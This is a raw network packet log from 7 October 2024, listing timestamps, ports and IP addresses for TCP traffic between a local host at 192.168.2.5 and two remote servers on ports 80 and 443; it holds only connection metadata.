Oct 7, 2024 03:15:42.122580051 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.122600079 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.122612953 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.122626066 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.122644901 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.122678041 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.122680902 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.122703075 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.122711897 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.122729063 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.122759104 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.196693897 CEST	443	49848	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.197433949 CEST	49848	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:42.197462082 CEST	443	49848	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.198247910 CEST	49848	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:42.198254108 CEST	443	49848	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.210696936 CEST	443	49849	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.210783958 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.210839033 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.210875034 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.210993052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.210997105 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.210997105 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.210997105 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.211055994 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.211076975 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.211123943 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.211163998 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.211174011 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.211177111 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.211230993 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.211230993 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.211265087 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.211311102 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.211316109 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.211349964 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.211359024 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.211390018 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.211400032 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.211432934 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.211484909 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.211486101 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.211536884 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.211538076 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.211572886 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.211608887 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.211616993 CEST	49849	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:42.211623907 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.211627960 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.211641073 CEST	443	49849	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.211658001 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.211702108 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.211709023 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.211740017 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.211743116 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.211760998 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.211791039 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.211793900 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.211833000 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.211842060 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.211867094 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.211884022 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.211900949 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.211908102 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.211934090 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.211955070 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.211982965 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.211985111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.212016106 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.212035894 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.212068081 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.212081909 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.212101936 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.212121964 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.212136030 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.212152004 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.212167978 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.212188959 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.212218046 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.212220907 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.212255001 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.212270975 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.212287903 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.212297916 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.212337017 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.212337971 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.212371111 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.212389946 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.212424040 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.212430000 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.212481976 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.212483883 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.212532997 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.212538958 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.212573051 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.212589979 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.212605000 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.212625980 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.212656021 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.212657928 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.212692022 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.212713957 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.212728977 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.212744951 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.212764025 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.212781906 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.212814093 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.212816000 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.212847948 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.212865114 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.212882996 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.212898970 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.212917089 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.212937117 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.212950945 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.212973118 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.212982893 CEST	49849	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:42.212990999 CEST	443	49849	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.213001966 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.213002920 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.213037014 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.213052034 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.213071108 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.213088989 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.213121891 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.213123083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.213160038 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.213175058 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.213193893 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.213210106 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.213227987 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.213248014 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.213260889 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.213279009 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.213294029 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.213319063 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.213325977 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.213336945 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.213360071 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.213376999 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.213392973 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.213411093 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.213424921 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.213448048 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.213458061 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.213478088 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.213490963 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.213507891 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.213524103 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.213542938 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.213557959 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.213576078 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.213593006 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.213608980 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.213627100 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.213644028 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.213660002 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.213675976 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.213694096 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.213711023 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.213726997 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.213749886 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.213761091 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.213781118 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.213793993 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.213814974 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.213826895 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.213846922 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.213860035 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.213876963 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.213892937 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.213916063 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.213927984 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.213943958 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.213960886 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.213979006 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.213994980 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.214011908 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.214027882 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.214044094 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.214062929 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.214080095 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.214096069 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.214112043 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.214129925 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.214148045 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.214165926 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.214183092 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.214202881 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.214216948 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.214236975 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.214257002 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.214271069 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.214286089 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.214304924 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.214322090 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.214339018 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.214355946 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.214371920 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.214395046 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.214405060 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.214418888 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.214437962 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.214454889 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.214472055 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.214488983 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.214505911 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.214524031 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.214540005 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.214557886 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.214574099 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.214591026 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.214608908 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.214624882 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.214642048 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.214658976 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.214674950 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.214692116 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.214709044 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.214725971 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.214745998 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.214757919 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.214780092 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.214796066 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.214813948 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.214829922 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.214847088 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.214864016 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.214880943 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.214896917 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.214914083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.214931965 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.214947939 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.214963913 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.214982986 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.214998007 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.215015888 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.215034008 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.215049982 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.215066910 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.215085983 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.215096951 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.215138912 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.286963940 CEST	443	49850	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.287755013 CEST	49850	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:42.287791967 CEST	443	49850	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.288490057 CEST	49850	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:42.288496971 CEST	443	49850	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.316042900 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316057920 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316073895 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316099882 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316116095 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.316119909 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316142082 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316149950 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316158056 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316164970 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316180944 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316201925 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.316277981 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316287041 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.316293955 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316308022 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316327095 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.316333055 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316348076 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316361904 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316366911 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.316389084 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316390991 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.316404104 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316416025 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.316431046 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316445112 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316452980 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.316461086 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316477060 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316493034 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.316493988 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316513062 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316518068 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.316529036 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316555023 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316555023 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.316569090 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316584110 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316591978 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.316611052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316627026 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316628933 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.316653967 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316668987 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.316669941 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316703081 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.316709042 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316724062 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316737890 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.316747904 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316761971 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316772938 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.316777945 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316798925 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.316852093 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316855907 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.316867113 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316890955 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316905022 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.316905975 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316942930 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.316945076 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316960096 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316975117 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.316987038 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.316991091 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317008018 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317024946 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317025900 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.317061901 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.317073107 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317084074 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.317121029 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.317126989 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317151070 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317169905 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.317171097 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317188025 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317195892 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.317205906 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317219973 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.317220926 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317239046 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317240953 CEST	49782	80	192.168.2.5	95.164.90.97
